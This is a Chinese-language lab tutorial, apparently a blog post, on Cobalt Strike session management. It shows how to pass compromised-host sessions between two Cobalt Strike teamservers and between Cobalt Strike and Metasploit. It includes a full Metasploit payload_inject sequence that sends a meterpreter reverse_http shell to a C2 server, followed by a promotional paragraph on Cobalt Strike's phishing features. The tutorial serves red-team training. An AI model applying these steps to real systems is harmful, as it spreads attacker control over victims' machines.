内网渗透神器CobaltStrike之会话管理(五)

CS之间派生会话

将CS1管理的会话派生至CS2中, 简单来说就是将CS1服务器的肉鸡送给CS2服务器


准备环境

主机描述
Kali(192.168.47.134)CS TeamServer1
Kali2(192.168.47.144)CS TeamServer2
Windows7(192.168.47.133)CS客户端,攻击机
Windows7(192.168.47.141)受害机

操作步骤

首先用CS客户端连接两个不同的CS服务器, 而我们要做的是将CS1的会话派生到CS2中去

image-20221005225524757


在CS2服务器和CS1服务器都新建一个同样配置的监听用于接收派生过来的会话, 监听的host地址要填写为CS2服务器ip地址

image-20221005225938081

image-20221005230525306


派生会话选择上述建立的监听, 随后切换至连接CS2服务器的客户端查看派生过来的主机

动画

1


CS派生会话至metasploit

将CS服务器的会话派生至metasploit中, 方便进行漏洞攻击


准备环境

主机描述
Kali(192.168.47.134)CS TeamServer1
Kali2(192.168.47.144)metasploit
Windows7(192.168.47.133)CS客户端,攻击机
Windows7(192.168.47.141)受害机

操作步骤

进入kali2输入命令:msfconsole, 运行metasploit

image-20221005234248726


metasploit新建监听用于接收CS派生过来的会话

image-20221006153754571


返回至CS服务器建立外部监听, payload选择Foreign HTTP, 其余内容与metasploit建立的监听一致

image-20221006153852260


派生会话选择上述建立的外部监听t, 然后返回Metasploit查看上线情况

动画


metasploit派生会话至CS

将metasploit管理的会话派生至CS服务器


准备环境

主机描述
Kali(192.168.47.134)CS TeamServer1
Kali2(192.168.47.144)metasploit
Windows7(192.168.47.133)CS客户端,攻击机
Windows7(192.168.47.141)受害机

操作步骤

首先查看MSF中需派生会话的ID, 输入命令: sessions, 此处要派生的会话ID为6 (下面的截图截错了)

image-20221006163339205


输入如下命令进行派生会话, 派生完成后返回会话的进程PID为3322

use exploit/windows/local/payload_inject  

set payload windows/meterpreter/reverse_http

set lhost 192.168.47.134

set lport 80

set disablepayloadhandler True  //默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true

set session 6

exploit

image-20221006173316522


返回CS查看上线的会话 (PID:3332)

image-20221006173808452

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cobalt Strike 4.4是一款专业的渗透测试工具,由Strategic Cyber LLC开发。它广泛被安全研究人员、红队和渗透测试人员使用,以评估网络安全的弱点和漏洞。 Cobalt Strike 4.4提供了各种功能和技术,包括钓鱼攻击、漏洞利用、社会工程学攻击和内网渗透等。它模拟了真实的攻击场景,能够帮助安全专家发现和修复网络中的安全问题。 其中,钓鱼攻击是Cobalt Strike 4.4的一个重要特性。它通过伪造电子邮件、网站和文件,诱使用户输入敏感信息,例如用户名、密码和信用卡信息。这可用于测试员评估目标组织员工的安全意识和行为。 Cobalt Strike 4.4还支持漏洞利用,用于发现和利用系统和应用程序的漏洞。这些漏洞可能导致入侵者获取未授权的访问权限,从而进一步探索和操纵目标网络。 社会工程学攻击是利用人的弱点和错误来获得机密信息的手段。Cobalt Strike 4.4中的社会工程学攻击模块可通过发送钓鱼电子邮件、制造假网站和执行欺骗性操作,诱使目标用户泄露敏感信息。 内网渗透Cobalt Strike 4.4的另一个重要功能。它模拟渗透攻击者在目标网络中的行为,尝试获取横向权限并访问受限资源。通过内网渗透渗透测试人员可以评估网络安全的脆弱点,并提出相应的解决方案来提高网络的防御能力。 总之,Cobalt Strike 4.4是一款功能强大的渗透测试工具,具有广泛的应用领域。它通过模拟攻击场景,帮助安全专家评估和提高网络安全性,保护组织免受潜在的网络攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值